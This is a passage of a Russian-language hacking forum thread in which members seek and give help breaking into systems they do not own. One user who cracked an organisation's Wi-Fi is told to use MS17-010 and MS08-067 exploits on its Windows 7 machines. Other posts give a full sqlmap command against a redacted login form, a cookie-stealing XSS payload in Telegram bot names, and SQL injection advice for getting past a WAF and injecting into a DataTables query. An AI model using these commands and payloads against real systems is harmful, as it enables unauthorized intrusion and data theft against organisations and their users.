HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2651  
Старый 12.08.2019, 22:18
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от SovaGSN  
SovaGSN said:

Всем доброго вечера! Подскажите, подобрал пароль к wi-fi роутеру организации, видно локальную сеть из 5 устройств и одного принтера. Компы на винде 7. Есть ли возможность проникнуть в расшаренные папки? ибо при попытке захода на удаленный комп внутри ЛВС требуется пароль и логин. Пароль требует только к компу админа, а остальные компы видны только как медиапроигрыватели
попробуй заюзать эксплоиты ms17-010, ms08-67, очень сомневаюсь что там винда пропатчена
 
Ответить с цитированием

  #2652  
Старый 13.08.2019, 01:09
AngelEyes
Guest
Сообщений: n/a
Провел на форуме:
1924

Репутация: 0
По умолчанию

sqlmap.py -u "https://******/client/login" -p "email" --risk="3" --level="3" --method="POST" --data="--3e306551ffbd4492975ea8cd2a9917cc

Content-Disposition: form-data; name=%22email%22

test

--3e306551ffbd4492975ea8cd2a9917cc

Content-Disposition: form-data; name=%22password%22

N3tsp@rker-

--3e306551ffbd4492975ea8cd2a9917cc

Content-Disposition: form-data; name=%22action%22

login

--3e306551ffbd4492975ea8cd2a9917cc

Content-Disposition: form-data; name=%22submit%22

Sign In

--3e306551ffbd4492975ea8cd2a9917cc

Content-Disposition: form-data; name=%22hash%22

3a4bf5ec9dcc971c08509bf8f5ca5cf1daac489a

--3e306551ffbd4492975ea8cd2a9917cc--

" --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36" --headers="Accept:application/json, text/javascript, */*; q=0.01\nContent-Type:multipart/form-data; boundary=----WebKitFormBoundaryOln7Ytw9vsNImdiP\nOrigin:https://*****\nX-Requested-With:XMLH...s://****/terms" --dbms="MySQL" --batch

Подскажите как это всё в мапу упаковать?Сама мапа не находит уяз на сайте,пришлось спаркером воспользоваться,команда выдает то,что выше,но мапа так это не хавает
 
Ответить с цитированием

  #2653  
Старый 13.08.2019, 12:39
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

положи весь запрос в файлик и обратись к нему через параметр -r file.txt
 
Ответить с цитированием

  #2654  
Старый 13.08.2019, 19:46
M.Billar
Guest
Сообщений: n/a
Провел на форуме:
16347

Репутация: 0
По умолчанию

Вот скажите, является ли уязвимостью тот факт, что в телеграм БОТах с админками вполне сносно работает XSS если указывать банальный код в имя-фамилию пользователя.

Большая часть админок, не фильтрует эти данные и выходит, что можно просто написать Имя: alert(document.cookie)

Зайти в бота, и в админке вуаля



Бага это сервиса или разработчиков, которых даже не предупреждают о таких "возможностях" ?)
 
Ответить с цитированием

  #2655  
Старый 13.08.2019, 22:24
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от M.Billar  
M.Billar said:

Вот скажите, является ли уязвимостью тот факт, что в телеграм БОТах с админками вполне сносно работает XSS если указывать банальный код в имя-фамилию пользователя.
Большая часть админок, не фильтрует эти данные и выходит, что можно просто написать Имя: alert(document.cookie)
Зайти в бота, и в админке вуаля

Бага это сервиса или разработчиков, которых даже не предупреждают о таких "возможностях" ?)
Да, является, с толковым подходом тут много что можно реализовать, на примере того же BEEF https://cryptoworld.su/beef-framework/, также в зависимости от того, как устроена/прописана админка, возможно воздействовать на функционал, опять же на примере XSS to RCE в wordpress или прочих CMS
 
Ответить с цитированием

  #2656  
Старый 14.08.2019, 01:15
M.Billar
Guest
Сообщений: n/a
Провел на форуме:
16347

Репутация: 0
По умолчанию

Цитата:
Сообщение от winstrool  
winstrool said:

Да, является, с толковым подходом тут много что можно реализовать, на примере того же BEEF
https://cryptoworld.su/beef-framework/
, также в зависимости от того, как устроена/прописана админка, возможно воздействовать на функционал, опять же на примере XSS to RCE в wordpress или прочих CMS


Печально обстоят дела с телегой... Ну вот что им стоит поднять задницу и профиксить это на выводе к ботам напр? А так, ходи, тр***й всех вокруг - им пофиг.
 
Ответить с цитированием

  #2657  
Старый 16.08.2019, 07:42
highmoore
Guest
Сообщений: n/a
Провел на форуме:
4388

Репутация: 0
По умолчанию

Цитата:
Сообщение от highmoore  
highmoore said:

Прошу помощи в раскрутке скули
Что есть? Сайт написанный на Coldfusion, юнион и булеан типы, скуля в гет параметре
Кручу мапом, мап видит булеан, через ордер бай понимает что есть и юнион, видит что там 3 колонки и натыкается на ваф
Ругается на слово union, select пропускает
Мап не может определить даже тип субд из-за того что ваф не пропускает его дальше
Ошибка вафа :
You are not permitted to run URL SQL Statements on this server. Your IP address has been logged and e-mailed to our administrator.

Пробовал юрл энкод, двойной юрл энкод, почти все тамперы которые хоть как-то могли помочь

Цитата:
Сообщение от highmoore  
highmoore said:

Да, это все я понимаю, дело в том, что я руками не могу, все варианты провалились, это MSSQL как оказалось
С которым у меня не так много опыта, буду благодарен за любую помощь
Простите за дубль, но все так же в поисках решения
 
Ответить с цитированием

  #2658  
Старый 16.08.2019, 12:55
BenderMR
Guest
Сообщений: n/a
Провел на форуме:
22457

Репутация: 10
По умолчанию

Цитата:
Сообщение от highmoore  
highmoore said:

Простите за дубль, но все так же в поисках решения
Кидай в лс, раскрутим ее. Помогу чем смогу
 
Ответить с цитированием

  #2659  
Старый 21.08.2019, 00:41
madam
Guest
Сообщений: n/a
Провел на форуме:
50513

Репутация: 1
По умолчанию

POST draw=4&columns[0][data]= '&columns[0][name]=Smith&columns[0][searchable]=true&columns[0][orderable]=true&columns[0][search][value]=3&columns[0][search][regex]=false&columns[1][data]=1&columns[1][name]=Smith&columns[1][searchable]=true&columns[1][orderable]=true&columns[1][search][value]=3&columns[1][search][regex]=false&columns[2][data]=2&columns[2][name]=Smith&columns[2][searchable]=true&columns[2][orderable]=true&columns[2][search][value]=3&columns[2][search][regex]=false&columns[3][data]=3&columns[3][name]=Smith&columns[3][searchable]=true&columns[3][orderable]=true&columns[3][search][value]=3&columns[3][search][regex]=false&columns[4][data]=4&columns[4][name]=Smith&columns[4][searchable]=true&columns[4][orderable]=true&columns[4][search][value]=3&columns[4][search][regex]=false&start=3&length=25&search[value]=3&search[regex]=false

A Database Error Occurred

Error Number: 1064

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'LIKE '%3%' OR LIKE '%3%' ) ORDER BY `date` DESC LIMIT 3, 100' at line 4

SELECT `email`, `date` FROM `login` WHERE `referral` = 'email.txt@email.com' AND ( LIKE '%3%' OR LIKE '%3%' ) ORDER BY `date` DESC LIMIT 3, 100

Filename: libraries/Datatables.php

Line Number: 354

крутиться вообще никак не хочет может кто подскажет что

sqlmap тоже не берёт
 
Ответить с цитированием

  #2660  
Старый 21.08.2019, 04:02
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585

Репутация: 818


Отправить сообщение для b3 с помощью ICQ
По умолчанию

вижу 2 колонки, а остальное не понятно. columns[0][data]= ' я так понял тут инжектите? А до ваших манипуляций там какие были данные? Если `date` это columns[0][data] тогда у вас иньекция в начале запроса:

Код:
Code:
SELECT `email`, `ТУТ_СКУЛЯ` FROM `login` WHERE `referral` = 'email.txt@email.com' AND ( LIKE '%3%' OR LIKE '%3%' ) ORDER BY `date` DESC LIMIT 3, 100
в таком случае вам нужно чтоб не нарушать запрос вывести 2 колонки и отбросить остальное комментарием кода.

Либо внедрить свой код так чтоб не нарушить оставшийся запрос, по типу:

columns[0][data]=(select version())

а еще не понятно почему ругается на LIKE и почему там нет AND если инжект в реферале.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ